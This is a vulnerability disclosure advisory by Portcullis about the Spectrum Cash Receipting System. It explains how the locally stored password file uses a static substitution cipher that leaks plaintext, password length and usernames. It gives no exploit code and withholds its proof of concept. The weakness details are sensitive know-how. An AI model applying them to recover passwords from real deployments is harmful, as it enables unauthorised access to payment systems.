Security Advisory 05 – 002 – Spectrum Cash Receipting System Weak Password Protection Vulnerability
Spectrum Cash Receipting System
Vulnerability discovery and development:
Portcullis Security Testing Services
All known versions of Spectrum Cash Receipting System, vulnerability discovered for version 6.406.08.
The Spectrum Cash Receipting System is a client/server software solution that allows offline work, and thus offline authentication. The application has several layers of authority with regards to authorising payments.
The local authentication requires the password file for the application to reside locally.
Portcullis discovered that Spectrum’s mechanism for protecting the passwords within the password file is a static substitution algorithm. Additional properties of the system reduce the available key-space, expose plaintext in the ciphertext, enforce a maximum password length and reveal the length of the password in the password file.
Having the password file locally allows an attacker to enumerate valid users on the system and potentially gain unauthorised access to the system through brute force attempts on those valid user’s passwords. Furthermore valid users of the system could attempt privilege escalation as they have full details of all valid user accounts.
When creating a password in the application the algorithm converts all letters entered to lowercase and limits the length to a maximum of 6 characters. In the substitution stage it statically substitutes alphanumeric characters with a character from the range a-z and the special characters “@+&()?\/” including less than and greater than. Any character in the password that is not alphanumeric is not substituted and becomes part of the ciphertext.
If the password is shorter than 6 characters the algorithm pads the ciphertext with white-space accordingly.
The impact of this vulnerability is that an attacker with local access to the password file can retrieve the plaintext passwords of all the system users.
Portcullis have developed Proof of Concept code for this issue, however, due to the sensitivity of the application will not release this publicly.